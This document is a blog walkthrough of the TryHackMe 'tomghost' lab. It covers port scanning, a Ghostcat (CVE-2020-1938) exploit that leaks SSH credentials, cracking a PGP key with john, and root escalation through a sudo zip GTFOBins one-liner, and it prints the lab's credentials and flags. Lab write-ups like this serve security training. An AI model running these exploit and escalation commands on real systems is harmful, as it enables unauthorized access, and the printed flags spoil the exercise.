Tryhackme - tomghost

Tryhackme – tomghost

In this walk through, we will be going through the tomghost room from Tryhackme. This room is rated as easy on the platform and the objective is to identify recent vulnerabilities in order to exploit the system or read files that we should not have access to. So, let’s get started without any delay.

tomghost

Machine Info:

Titletomghost
IPaddress10.10.203.67
DifficultyEasy
ObjectiveIdentify recent vulnerabilities to try exploit the system or read files that you should not have access to.

Enumeration:

  • Checking if machine is live or not.

pinging the machine

  • I started with a normal Nmap scan with version detection.

sudo nmap -sS -sV 10.10.222.43 

nmap scan

  • Next, i used gobuster to perform directory bruteforcing to reveal some juicy directories.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.222.43:8080/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.43:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/13 21:02:54 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico          (Status: 200) [Size: 21630]             
/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
/manager              (Status: 302) [Size: 0] [--> /manager/]     
                                                                  
===============================================================
2023/04/13 21:04:31 Finished
===============================================================

gobuster scan

  • Googling the exact “Apache Tomcat 9.0.30 vulnerabilities”. We found one – CVE-2020-1938 (Ghostcat)

CVE-2020-1938 (Ghostcat)

Exploit: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat

  • Firing off the exploit, we found a potential username and password combinations beneath the Welcome section. We can now use it to get our initial access via SSH.

wh1terose@fsociety:~/CTF/TryHackme/tomghost/Hacking-Vulnerability-CVE-2020-1938-Ghostcat$ python2 CVE-2020-1938.py 10.10.222.43 -p 8009 -f WEB-INF/web.xml 
Getting resource at ajp13://10.10.222.43:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
	skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>

ghostcatexploit

Gaining Access:

  • Let’s login into the server with SSH using the below credentials.

Creds: skyfuck:8730281lkjlkjdqlksalks

ssh login

user.txt

  • Found two files one .asc file and the other a .pgp one. We will target the .asc file as it contain a private key.

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
skyfuck@ubuntu:~$ cat tryhackme.asc 
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG v1.63

lQUBBF5ocmIRDADTwu9RL5uol6+jCnuoK58+PEtPh0Zfdj4+q8z61PL56tz6YxmF
3TxA9u2jV73qFdMr5EwktTXRlEo0LTGeMzZ9R/uqe+BeBUNCZW6tqI7wDw/U1DEf
StRTV1+ZmgcAjjwzr2B6qplWHhyi9PIzefiw1smqSK31MBWGamkKp/vRB5xMoOr5
ZsFq67z/5KfngjhgKWeGKLw4wXPswyIdmdnduWgpwBm4vTWlxPf1hxkDRbAa3cFD
B0zktqArgROuSQ8sftGYkS/uVtyna6qbF4ywND8P6BMpLIsTKhn+r2KwLcihLtPk
V0K3Dfh+6bZeIVam50QgOAXqvetuIyTt7PiCXbvOpQO3OIDgAZDLodoKdTzuaXLa
cuNXmg/wcRELmhiBsKYYCTFtzdF18Pd9cM0L0mVy/nfhQKFRGx9kQkHweXVt+Pbb
3AwfUyH+CZD5z74jO53N2gRNibUPdVune7pGQVtgjRrvhBiBJpajtzYG+PzBomOf
RGZzGSgWQgYg3McBALTlTlmXgobn9kkJTn6UG/2Hg7T5QkxIZ7yQhPp+rOOhDACY
hloI89P7cUoeQhzkMwmDKpTMd6Q/dT+PeVAtI9w7TCPjISadp3GvwuFrQvROkJYr
WAD6060AMqIv0vpkvCa471xOariGiSSUsQCQI/yZBNjHU+G44PIq+RvB5F5O1oAO

<-- snipped -->

-----END PGP PRIVATE KEY BLOCK-----

  • Cracking the gpg file using john. First I convert the file to john crackable format using gpg2john and then fired john on it.

wh1terose@fsociety:~/CTF/TryHackme/tomghost$ gedit hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/gpg2john hash.txt > crack

File hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ls
crack  Hacking-Vulnerability-CVE-2020-1938-Ghostcat  hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/john crack 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-04-13 21:53) 0g/s 21405p/s 21405c/s 21405C/s Comstuxnet1900..Cstuxnet1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
alexandru        (tryhackme)     
1g 0:00:00:00 DONE 2/3 (2023-04-13 21:53) 1.052g/s 21303p/s 21303c/s 21303C/s rooney..blahblah1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

  • GPG password: alexandru

  • Decrypting the pgp file using the above cracked password.

skyfuck@ubuntu:~$ gpg -d credential.pgp 

You need a passphrase to unlock the secret key for
user: "tryhackme <[email protected]>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <[email protected]>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jskyfuck@ubuntu:~$ 

gpg -d credential.gpg

Merlin password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

change user to merlin

Privilege Escalation:

  • First I check if there is any file that we can run as sudo and found one.

merlin@ubuntu:/$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

sudo -l

  • Using GTFO bins to elevate our privilege using the zip binary.

GTFObins zip

merlin@ubuntu:/$ TF=$(mktemp -u)
merlin@ubuntu:/$ sudo /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/
# cd root
# ls
root.txt  ufw
# cat root.txt	
THM{Z1P_1S_FAKE}

root flag

Task 1 – Flags

Question 1 – Compromise this machine and obtain user.txt

THM{GhostCat_1s_so_cr4sy}

Question 2 – Escalate privileges and obtain root.txt

THM{Z1P_1S_FAKE}

Task 1 - Flags

Also Read: Tryhackme – The Cod Caper

Conclusion:

Conclusion

So that was “tomghost” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, found two ports opened – 22 (SSH) and 8080 (Apache Tomcat). Next, we fired gobuster to perform some directory bruteforcing to reveal some juicy directories. Moving on, i looked for known exploits for Apache Tomcat 9.0.30 and found a CVE-2020-1938 (Ghostcat). Using the exploit got the credentials to logged into the server and got initial access. Once inside, found two files one .asc file and the other a .pgp one. Converted and cracked the .asc file with john and used that password to access the .pgp file which reveals the user merlin and its password. At last, used zip binary sudo misconfiguration to escalate our privileges to get the root flag and the hair of the neighbor’s black cat for our voodo procedure. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top